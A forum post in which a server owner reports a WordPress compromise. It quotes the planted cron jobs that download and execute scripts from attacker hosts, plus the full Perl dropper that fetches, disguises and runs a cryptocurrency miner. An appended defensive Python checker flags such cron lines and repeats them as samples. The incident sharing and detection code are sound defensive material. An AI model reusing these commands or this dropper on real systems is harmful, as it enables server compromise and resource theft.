Thread: Tech hacking Assholes
Old 06-02-2014, 03:23 PM  
sarettah
see you later, I'm gone
 
Join Date: Oct 2002
Posts: 14,122
hacking Assholes

So, one of my servers was running at about 400% apparently.

When all was said and done, it seems that someone used a WP hack on one of my client's WP installs and then managed to somehow gain shell access to set up 2 cron jobs, one under each of 2 different user accounts.

The cron job appears to create an instance of a bitcoin mining operation of some kind.

I found it being discussed here: http://serverfault.com/questions/598...-100-cpu-usage

This is one of the crons that was created:

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*
*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*
*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*
10 2 * * * killall -9 /usr/bin/host;cd /tmp;wget http://95.154.227.98/.../libcfg.txt;curl -O http://95.154.227.98/.../libcfg.txt;mv libcfg.txt libcfg.php;php libcfg.php

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt


************************************End of cron

And this is the little perl script that they pull in in the abc.txt file:

#!/usr/bin/perl
system("killall -9 minerd");
system("killall -9 PWNEDa");
system("killall -9 PWNEDb");
system("killall -9 PWNEDc");
system("killall -9 PWNEDd");
system("killall -9 PWNEDe");
system("killall -9 PWNEDg");
system("killall -9 PWNEDm");
system("killall -9 minerd64");
system("killall -9 minerd32");
system("killall -9 named");
$rn=1;
$ar=`uname -m`;
while($rn==1 || $rn==0) { $rn=int(rand(11)); }
$exists=`ls /tmp/.Ice-unix`;
$cratch=`ps aux | grep -v grep | grep kernelcfg`;
$cratchx=`ps aux | grep -v grep | grep kernelupdates`;
if($cratch=~/kernelcfg/gi || $cratchx=~/kernelupdates/gi) { die; }

if($exists!~/kernelcfg/gi) {
$wig=`wget --version | grep GNU`;
if(length($wig)<6) {
if($ar=~/64/g) {
system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;wget http://41.215.22.162/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg");
} else {
system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;wget http://41.215.22.162/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg");
}
} else {
if($ar=~/64/g) {
system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;curl -O http://41.215.22.162/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg");
} else {
system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;curl -O http://41.215.22.162/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg");
}
}
}

@prts=('8332','9091','1121','7332','6332','1332',' 9333','2961','8382','8332','9091','1121','7332','6 332','1332','9333','2961','8382');
$prt=0;
while(length($prt)<4) { $prt=$prts[int(rand(19))-1]; }
print "setup for $rn:$prt done :-)\n";

while(1) {
$cratch=`ps aux | grep -v grep | grep kernelcfg`;
$cratchx=`ps aux | grep -v grep | grep kernelupdates`;
if($cratch!~/kernelcfg/gi && $cratch!~/kernelupdates/gi) {
system("cd /tmp/.Ice-unix;./kernelcfg -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &");
}
sleep(5);
}

****************************************************

I am getting the idea that it is a bitcoin mining thing only because of some of the variable names in there and the discussion I linked to. I have not examined the code at all yet.

So, how many coins do you think they managed to do off my little server? I am guessing about .00000000001 BC across the week ;p
__________________
All cookies cleared!
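For anyone auditing their own boxes after reading this, here is a small added checker (not from the post or the serverfault thread) that flags crontab lines combining the traits seen above: fetching with wget/curl, working in /tmp, handing the download to an interpreter, and killing other processes. The sample crontab is constructed, with the truncated URLs kept exactly as quoted in the post.

```python
import re

# Constructed sample crontab: two benign jobs plus entries modelled on the post.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*
10 2 * * * killall -9 /usr/bin/host;cd /tmp;wget http://95.154.227.98/.../libcfg.txt;curl -O http://95.154.227.98/.../libcfg.txt;mv libcfg.txt libcfg.php;php libcfg.php
30 4 * * 0 /usr/local/bin/backup.sh >/dev/null 2>&1
"""

FETCH = re.compile(r"\b(wget|curl)\b")
# Interpreter must start a command (line start or after ; & | or space), so "backup.sh" is not counted.
INTERP = re.compile(r"(?:^|[;&|\s])(perl|php|python[23]?|sh|bash)\s+\S+")
TMPDIR = re.compile(r"(?:^|[;&|\s])cd\s+/(?:tmp|dev/shm|var/tmp)\b")
KILL = re.compile(r"\bkillall\b")
CRON_FIELDS = re.compile(r"^(\S+\s+){5}(?P<cmd>.+)$")  # five time fields, then the command

def score_cron_line(line):
    """Return (score, reasons) for one crontab line; 0 means nothing suspicious."""
    line = line.strip()
    if not line or line.startswith("#"):
        return 0, []
    m = CRON_FIELDS.match(line)
    if not m:
        return 0, []
    cmd = m.group("cmd")
    reasons = []
    if FETCH.search(cmd):
        reasons.append("downloads content with wget/curl")
    if INTERP.search(cmd):
        reasons.append("runs a script through an interpreter")
    if TMPDIR.search(cmd):
        reasons.append("works inside a world-writable temp dir")
    if KILL.search(cmd):
        reasons.append("kills other processes")
    return len(reasons), reasons

def suspicious_cron_lines(text, threshold=2):
    """Return [(line, reasons)] for lines whose score reaches the threshold."""
    hits = []
    for line in text.splitlines():
        score, reasons = score_cron_line(line)
        if score >= threshold:
            hits.append((line.strip(), reasons))
    return hits

if __name__ == "__main__":
    for line, reasons in suspicious_cron_lines(SAMPLE_CRONTAB):
        print(line[:60] + "...", "->", "; ".join(reasons))
```

Run it against `crontab -l -u <user>` output for every account (and /etc/cron.d), since the post notes the jobs were planted under two different users.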